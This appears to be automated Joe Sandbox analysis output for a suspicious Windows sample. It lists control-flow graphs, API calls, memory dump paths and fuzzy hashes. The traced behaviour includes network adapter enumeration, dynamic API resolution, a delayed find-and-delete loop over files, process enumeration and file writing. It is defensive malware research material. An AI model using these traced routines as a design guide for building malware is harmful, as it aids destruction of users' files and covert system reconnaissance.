control_flow_graph 999 15a930-15a996 1000 15a9b4-15aae9 call 142f90 call 1413e0 call 151bb0 GetProcessHeap 999->1000 1001 15a998-15a9ad 999->1001 1008 15ab54-15abaf call 142f90 LoadLibraryA 1000->1008 1009 15aaeb-15aafd 1000->1009 1001->1000 1016 15abb1-15abbd 1008->1016 1017 15abc3-15abf4 call 151bb0 1008->1017 1010 15ab12-15ab2c 1009->1010 1011 15aaff-15ab11 1009->1011 1013 15ab41-15ab53 1010->1013 1014 15ab2e-15ab40 1010->1014 1016->1017 1020 15abf6-15ac0d 1017->1020 1021 15ac53-15ac6d 1017->1021 1024 15ac0f-15ac2a 1020->1024 1025 15ac2b-15ac3b 1020->1025 1022 15ac83 1021->1022 1023 15ac6f-15ac81 1021->1023 1028 15ac8d-15acee call 142f90 GetProcAddress call 151bb0 1022->1028 1023->1028 1026 15ac3d-15ac44 1025->1026 1027 15ac4a-15ac52 1025->1027 1026->1027 1033 15acf0-15ad27 FreeLibrary 1028->1033 1034 15ad28-15ad76 HeapAlloc 1028->1034 1035 15ad8c-15ad9a 1034->1035 1036 15ad78-15ad8a 1034->1036 1037 15ada0-15ada2 1035->1037 1036->1037 1038 15ada4-15adc8 1037->1038 1039 15adfa-15ae2a GetAdaptersInfo 1037->1039 1040 15add4-15adf9 FreeLibrary 1038->1040 1041 15adca 1038->1041 1042 15ae30-15ae75 HeapFree 1039->1042 1043 15af4b 1039->1043 1041->1040 1044 15ae77-15ae84 1042->1044 1045 15ae8a-15aea8 HeapAlloc 1042->1045 1046 15af50-15af6e 1043->1046 1044->1045 1047 15af24-15af49 1045->1047 1048 15aeaa-15aedd FreeLibrary 1045->1048 1049 15af70-15af7d 1046->1049 1050 15af83-15af9e GetAdaptersInfo 1046->1050 1047->1046 1051 15af11-15af23 1048->1051 1052 15aedf-15af10 1048->1052 1049->1050 1053 15afa4-15afe6 1050->1053 1054 15b6a3 1050->1054 1056 15aff2-15b060 call 142f90 call 1413e0 1053->1056 1057 15afe8 1053->1057 1055 15b6ad-15b71d HeapFree FreeLibrary 1054->1055 1062 15b062 1056->1062 1063 15b06c-15b0ad call 151bb0 1056->1063 1057->1056 1062->1063 1066 15b0b3-15b0e0 call 16b260 1063->1066 1069 15b1e5-15b21d 1066->1069 1070 15b0e6-15b125 call 16b260 1066->1070 1071 15b223-15b225 1069->1071 1076 15b127-15b141 1070->1076 1077 15b143-15b157 1070->1077 1071->1066 1073 15b22b-15b22e 1071->1073 1075 15b659-15b6a1 call 16a7e0 1073->1075 1075->1055 1079 15b15d-15b15f 1076->1079 1077->1079 1081 15b161-15b1b2 1079->1081 1082 15b1d3-15b1df 1079->1082 1083 15b1b4 1081->1083 1084 15b1be-15b1c5 1081->1084 1082->1069 1083->1084 1085 15b1c7-15b1d1 1084->1085 1086 15b233-15b274 call 142f90 1084->1086 1085->1071 1089 15b276-15b294 1086->1089 1090 15b29a-15b2d1 call 1413e0 call 151bb0 1086->1090 1089->1090 1095 15b2d3-15b2dd 1090->1095 1096 15b2df-15b2fe 1090->1096 1097 15b30a-15b31e 1095->1097 1096->1097 1098 15b300 1096->1098 1099 15b395 1097->1099 1100 15b320-15b360 1097->1100 1098->1097 1103 15b397-15b39e 1099->1103 1101 15b362-15b376 1100->1101 1102 15b378-15b393 1100->1102 1101->1103 1102->1103 1104 15b3a4-15b402 1103->1104 1105 15b5d1-15b656 call 16a7e0 1103->1105 1106 15b404-15b41c 1104->1106 1107 15b43d-15b4b0 1104->1107 1105->1075 1106->1107 1111 15b41e-15b437 1106->1111 1109 15b4b2-15b4bc 1107->1109 1110 15b4be-15b4ea 1107->1110 1113 15b50a-15b510 1109->1113 1110->1113 1114 15b4ec-15b504 1110->1114 1111->1107 1115 15b517-15b530 1113->1115 1116 15b512-15b516 1113->1116 1114->1113 1117 15b532-15b541 1115->1117 1118 15b579-15b592 1115->1118 1116->1115 1119 15b561-15b577 1117->1119 1120 15b543-15b55f 1117->1120 1121 15b598-15b5c8 1118->1121 1119->1121 1120->1121 1121->1104 1122 15b5ce 1121->1122 1122->1105
APIs
Strings
Memory Dump Source
• Source File: 0000000B.00000002.2531980973.0000000000141000.00000020.00000001.01000000.00000005.sdmp, Offset: 00140000, based on PE: true
• Associated: 0000000B.00000002.2531909149.0000000000140000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000B.00000002.2532039542.0000000000177000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000B.00000002.2532083179.000000000017C000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000B.00000002.2532083179.00000000001B3000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000B.00000002.2532083179.00000000001B6000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000B.00000002.2532083179.00000000001B9000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000B.00000002.2532083179.00000000001CA000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000B.00000002.2532323438.00000000001CB000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_140000_idtpqzltyfy.jbxd
Similarity
• API ID: HeapProcess
• String ID: #~\
• API String ID: 54951025-95464956
• Opcode ID: 78b4514fca032ac38f2048c54f6be1c7d5ae35206958cb6b6a394fc72ff63e13
• Instruction ID: f5e059731d034deb7662b2b573f59cf7ee5e479a09cbcd0b11f0d708ed3ccc74
• Opcode Fuzzy Hash: 78b4514fca032ac38f2048c54f6be1c7d5ae35206958cb6b6a394fc72ff63e13
• Instruction Fuzzy Hash: 58720E76A04205CFC304DF65FC866A53BF5FB98312B51421AE845DBEB0EB708AE5CB91

Control-flow Graph
control_flow_graph 1123 169580-1695a3 1124 169963-169966 1123->1124 1125 1695a9-1695d1 1123->1125 1126 1695d3 1125->1126 1127 1695dd-1695f2 1125->1127 1126->1127 1128 1695f4 1127->1128 1129 1695fe-169707 call 152a20 call 14d500 Sleep call 14c580 call 142f90 1127->1129 1128->1129 1138 169731-169747 1129->1138 1139 169709-169721 1129->1139 1141 16974d-169773 call 14c580 1138->1141 1140 169723-16972f 1139->1140 1139->1141 1140->1141 1144 169795-1697d4 call 151bb0 FindFirstFileA 1141->1144 1145 169775-16978f 1141->1145 1148 1697d6-169802 1144->1148 1149 169808-16980a 1144->1149 1145->1144 1148->1149 1150 169902-169962 call 16a7e0 1149->1150 1151 169810-16982b 1149->1151 1150->1124 1152 169830-16985c 1151->1152 1154 169864-1698d3 call 14c580 DeleteFileA FindNextFileA 1152->1154 1155 16985e 1152->1155 1154->1152 1159 1698d9-1698fb FindClose 1154->1159 1155->1154 1159->1150
APIs
• Sleep.KERNELBASE(000003E8,00000001), ref: 00169679
• FindFirstFileA.KERNELBASE(?,?), ref: 001697B8
• DeleteFileA.KERNELBASE(?), ref: 001698A9
• FindNextFileA.KERNELBASE(00000000,?), ref: 001698CB
• FindClose.KERNEL32(00000000), ref: 001698E4
Memory Dump Source
• Source File: 0000000B.00000002.2531980973.0000000000141000.00000020.00000001.01000000.00000005.sdmp, Offset: 00140000, based on PE: true
• Associated: 0000000B.00000002.2531909149.0000000000140000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000B.00000002.2532039542.0000000000177000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000B.00000002.2532083179.000000000017C000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000B.00000002.2532083179.00000000001B3000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000B.00000002.2532083179.00000000001B6000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000B.00000002.2532083179.00000000001B9000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000B.00000002.2532083179.00000000001CA000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000B.00000002.2532323438.00000000001CB000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_140000_idtpqzltyfy.jbxd
Similarity
• API ID: FileFind$CloseDeleteFirstNextSleep
• String ID:
• API String ID: 1528862845-0
• Opcode ID: c949ea3f2e6a2350f6bf94a409c1f545a5a5e425c8513c22f02f1df68cce28f4
• Instruction ID: 4b7ec12d77ae79b803ec06132f6e0ec141d2224b252409d7c9888dc2bb5e892e
• Opcode Fuzzy Hash: c949ea3f2e6a2350f6bf94a409c1f545a5a5e425c8513c22f02f1df68cce28f4
• Instruction Fuzzy Hash: B3914375901205DFC714DF34FC86AA53BB9FB98704B40861AE94687E70EB348AE1CF91

Control-flow Graph
control_flow_graph 1596 150920-150943 1597 150945-150958 1596->1597 1598 15095e-15099c 1596->1598 1597->1598 1599 15099e-1509a8 1598->1599 1600 1509aa-1509b7 1598->1600 1601 1509be-150a34 call 163110 1599->1601 1600->1601 1604 150bd4-150bea 1601->1604 1605 150a3a-150aa5 call 142f90 GetProcAddress 1601->1605 1607 150bec-150bf4 1604->1607 1608 150bfa-150c01 1604->1608 1612 150aa7-150ab1 1605->1612 1613 150ab3-150ac0 1605->1613 1607->1608 1610 150c03-150c18 CryptGenRandom 1608->1610 1611 150c58-150c7c 1608->1611 1610->1611 1614 150c1a-150c52 1610->1614 1615 150c94 1611->1615 1616 150c7e-150c92 1611->1616 1617 150ac7-150b44 call 142f90 call 151bb0 GetProcAddress call 151bb0 1612->1617 1613->1617 1614->1611 1618 150c9e-150ca6 1615->1618 1616->1618 1636 150b46-150b4d 1617->1636 1637 150b9d-150bb7 1617->1637 1620 150d64-150da2 call 16fcc0 1618->1620 1621 150cac-150cda call 142860 * 2 1618->1621 1632 150cdc-150d02 1621->1632 1633 150d08-150d58 call 142860 * 2 1621->1633 1632->1633 1633->1620 1645 150d5a 1633->1645 1636->1637 1640 150b4f-150b5b 1636->1640 1638 150bbd-150bd1 1637->1638 1638->1604 1642 150b62-150b64 1640->1642 1642->1637 1644 150b66-150b9b 1642->1644 1644->1638 1645->1620
APIs
• GetProcAddress.KERNEL32(76850000,00000000), ref: 00150A8A
• GetProcAddress.KERNEL32(76850000,00000000), ref: 00150B05
• CryptGenRandom.ADVAPI32(00000000,00000004,00000000,00000000), ref: 00150C10
Memory Dump Source
• Source File: 0000000B.00000002.2531980973.0000000000141000.00000020.00000001.01000000.00000005.sdmp, Offset: 00140000, based on PE: true
• Associated: 0000000B.00000002.2531909149.0000000000140000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000B.00000002.2532039542.0000000000177000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000B.00000002.2532083179.000000000017C000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000B.00000002.2532083179.00000000001B3000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000B.00000002.2532083179.00000000001B6000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000B.00000002.2532083179.00000000001B9000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000B.00000002.2532083179.00000000001CA000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000B.00000002.2532323438.00000000001CB000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_140000_idtpqzltyfy.jbxd
Similarity
• API ID: AddressProc$CryptRandom
• String ID:
• API String ID: 646182245-0
• Opcode ID: 1e3089d542ef6e99337a3c23b6dd01c75f5a8e89c589ef8a6d3e53cd1a5e9817
• Instruction ID: 9a44081cad21fa68937cdfac915acb2760fe07f4e57f5f8e993902d14031d0fe
• Opcode Fuzzy Hash: 1e3089d542ef6e99337a3c23b6dd01c75f5a8e89c589ef8a6d3e53cd1a5e9817
• Instruction Fuzzy Hash: 2AB176B2A00315DBC315DFA9FC85A253BB4FB58715B01422EE8569BEB8E33089D5CF85

Control-flow Graph
control_flow_graph 1172 152120-15218a 1173 152196-1521f8 CreateToolhelp32Snapshot 1172->1173 1174 15218c 1172->1174 1175 1521fe-152239 1173->1175 1176 1524b9-1524fd call 16a7e0 1173->1176 1174->1173 1178 15224f-152274 Process32First 1175->1178 1179 15223b-152248 1175->1179 1181 15240d-15244e FindCloseChangeNotification 1178->1181 1182 15227a 1178->1182 1179->1178 1183 152450-152469 1181->1183 1184 15246b-152497 1181->1184 1185 152280-152292 1182->1185 1183->1176 1184->1176 1188 152499-1524b2 1184->1188 1186 152294-1522a0 1185->1186 1187 1522a6-1522ce call 1413e0 1185->1187 1186->1187 1191 1522d0-1522e6 1187->1191 1192 15230f 1187->1192 1188->1176 1193 152319-152344 call 14a4e0 call 16b260 1191->1193 1194 1522e8-15230d 1191->1194 1192->1193 1199 152346-152396 Process32Next 1193->1199 1200 15239e-1523ac 1193->1200 1194->1193 1199->1185 1201 15239c 1199->1201 1202 1523d2-152401 1200->1202 1203 1523ae-1523cc 1200->1203 1201->1181 1202->1181 1204 152403 1202->1204 1203->1202 1204->1181
APIs
• CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 001521D0
• Process32First.KERNEL32(00000000,00000128), ref: 00152257
• Process32Next.KERNEL32(00000000,00000128), ref: 00152384
• FindCloseChangeNotification.KERNELBASE(00000000), ref: 00152426
Memory Dump Source
• Source File: 0000000B.00000002.2531980973.0000000000141000.00000020.00000001.01000000.00000005.sdmp, Offset: 00140000, based on PE: true
• Associated: 0000000B.00000002.2531909149.0000000000140000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000B.00000002.2532039542.0000000000177000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000B.00000002.2532083179.000000000017C000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000B.00000002.2532083179.00000000001B3000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000B.00000002.2532083179.00000000001B6000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000B.00000002.2532083179.00000000001B9000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000B.00000002.2532083179.00000000001CA000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000B.00000002.2532323438.00000000001CB000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_140000_idtpqzltyfy.jbxd
Similarity
• API ID: Process32$ChangeCloseCreateFindFirstNextNotificationSnapshotToolhelp32
• String ID:
• API String ID: 3243318325-0
• Opcode ID: df6481a2fc8bef7960ef4df4ab32a0a47e318a250fa21f99609356e2b18cc9b3
• Instruction ID: 59af42ebffe2aa8119f653f5c99daec505b1ab9a5abd3c0c54f61812807c80c2
• Opcode Fuzzy Hash: df6481a2fc8bef7960ef4df4ab32a0a47e318a250fa21f99609356e2b18cc9b3
• Instruction Fuzzy Hash: 95913372A00314CFC305DF25FC89AA53BB4FBA9310F15820AD84296EB4EB7486E9CF51

Control-flow Graph
control_flow_graph 1646 151d90-151e21 call 175df0 call 163110 1651 151e23-151e4b call 16fcc0 1646->1651 1652 151e4c-151e91 CreateFileA 1646->1652 1654 151ed1-151ef0 1652->1654 1655 151e93-151ed0 call 16fcc0 1652->1655 1658 151ef2-151f06 1654->1658 1659 151f0c-151f18 1654->1659 1658->1659 1661 151f20-151f3e 1659->1661 1662 151f40-151f57 1661->1662 1663 151f59-151f85 1661->1663 1664 151f8b-152063 call 14b620 call 16ff30 WriteFile 1662->1664 1663->1664 1664->1661 1669 152069-15209c FindCloseChangeNotification call 16fcc0 1664->1669 1671 1520a1-1520b6 1669->1671 1672 1520c2-1520ca 1671->1672 1673 1520b8 1671->1673 1673->1672
APIs
  • Part of subcall function 00163110: WaitForSingleObject.KERNEL32(00000708,00004E20,?,00150A18,00000114,00000000,00000000,?,0015126B,?,001625B4,?,00000708,00000000), ref: 001631AD
• CreateFileA.KERNELBASE(?,40000000,00000000,00000000,00000002,00000000,00000000,00000000,?,?,?,?,?,?,-0000004B,00000009), ref: 00151E7B
  • Part of subcall function 0016FCC0: ReleaseMutex.KERNEL32(00150D8E,?,00150D8E,00000114,00000000), ref: 0016FCE9
Memory Dump Source
• Source File: 0000000B.00000002.2531980973.0000000000141000.00000020.00000001.01000000.00000005.sdmp, Offset: 00140000, based on PE: true
• Associated: 0000000B.00000002.2531909149.0000000000140000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000B.00000002.2532039542.0000000000177000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000B.00000002.2532083179.000000000017C000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000B.00000002.2532083179.00000000001B3000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000B.00000002.2532083179.00000000001B6000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000B.00000002.2532083179.00000000001B9000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000B.00000002.2532083179.00000000001CA000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000B.00000002.2532323438.00000000001CB000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_140000_idtpqzltyfy.jbxd
Similarity
• API ID: CreateFileMutexObjectReleaseSingleWait
• String ID:
• API String ID: 1564016613-0
• Opcode ID: 37c28564cba5a741b0206745fee1ea3b11a0d511c04560e6312677a5e70a4794
• Instruction ID: 4c38f319b3cbb9f489e097b241f6d020158641a4adba2a40a042d69e04128246
• Opcode Fuzzy Hash: 37c28564cba5a741b0206745fee1ea3b11a0d511c04560e6312677a5e70a4794
• Instruction Fuzzy Hash: 7D71F472611204DFC304DF64FC89A6A3BB9FB98315F418259E80697EB4DB709AE5CF81

Control-flow Graph (graph image not reproduced; legend: Executed / Not Executed): basic blocks 163cf0-163ef7, with calls to 14e430, 142f90, 14c580, 151bb0 and 16a7e0, and the API call CreateFileA.
APIs
• CreateFileA.KERNELBASE(?,C0000000,00000000,00000000,00000002,00000000,00000000), ref: 00163E0B
Memory Dump Source
• Source File: 0000000B.00000002.2531980973.0000000000141000.00000020.00000001.01000000.00000005.sdmp, Offset: 00140000, based on PE: true
• Associated: 0000000B.00000002.2531909149.0000000000140000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000B.00000002.2532039542.0000000000177000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000B.00000002.2532083179.000000000017C000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000B.00000002.2532083179.00000000001B3000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000B.00000002.2532083179.00000000001B6000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000B.00000002.2532083179.00000000001B9000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000B.00000002.2532083179.00000000001CA000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000B.00000002.2532323438.00000000001CB000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_140000_idtpqzltyfy.jbxd
Similarity
• API ID: CreateFile
• String ID:
• API String ID: 823142352-0
• Opcode ID: 6067148dacfaaca10ff7886e7f0ae1bcb1f024ef822556e2d9005961edea5d71
• Instruction ID: 5397fee7e2b920637bbddda1b32943dd6f83130f7f52fca8c039dd05e7acc12c
• Opcode Fuzzy Hash: 6067148dacfaaca10ff7886e7f0ae1bcb1f024ef822556e2d9005961edea5d71
• Instruction Fuzzy Hash: 9E412372A10314DBD314AF20FC82BA13BB1F7A4710F524219E651E6DB5FB709AE1CB91
APIs
• lstrlen.KERNEL32(00152325,00000000,?,00152325,?), ref: 0014A4FE
Memory Dump Source
• Source File: 0000000B.00000002.2531980973.0000000000141000.00000020.00000001.01000000.00000005.sdmp, Offset: 00140000, based on PE: true
• Associated: 0000000B.00000002.2531909149.0000000000140000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000B.00000002.2532039542.0000000000177000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000B.00000002.2532083179.000000000017C000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000B.00000002.2532083179.00000000001B3000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000B.00000002.2532083179.00000000001B6000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000B.00000002.2532083179.00000000001B9000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000B.00000002.2532083179.00000000001CA000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000B.00000002.2532323438.00000000001CB000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_140000_idtpqzltyfy.jbxd
Similarity
• API ID: lstrlen
• String ID:
• API String ID: 1659193697-0
• Opcode ID: cb5344382e32d7667f7ad6ad5330b9229be933540e370482a7f9664a0f35c812
• Instruction ID: 1e7763b11c5200db3712b05806d599bd6850ffa4db8f98c1eab530ff360ec9b2
• Opcode Fuzzy Hash: cb5344382e32d7667f7ad6ad5330b9229be933540e370482a7f9664a0f35c812
• Instruction Fuzzy Hash: CAF0CD71600220EFC3025F21FD4D5663BB8FF893613840512E48A86974E77489E2DFD2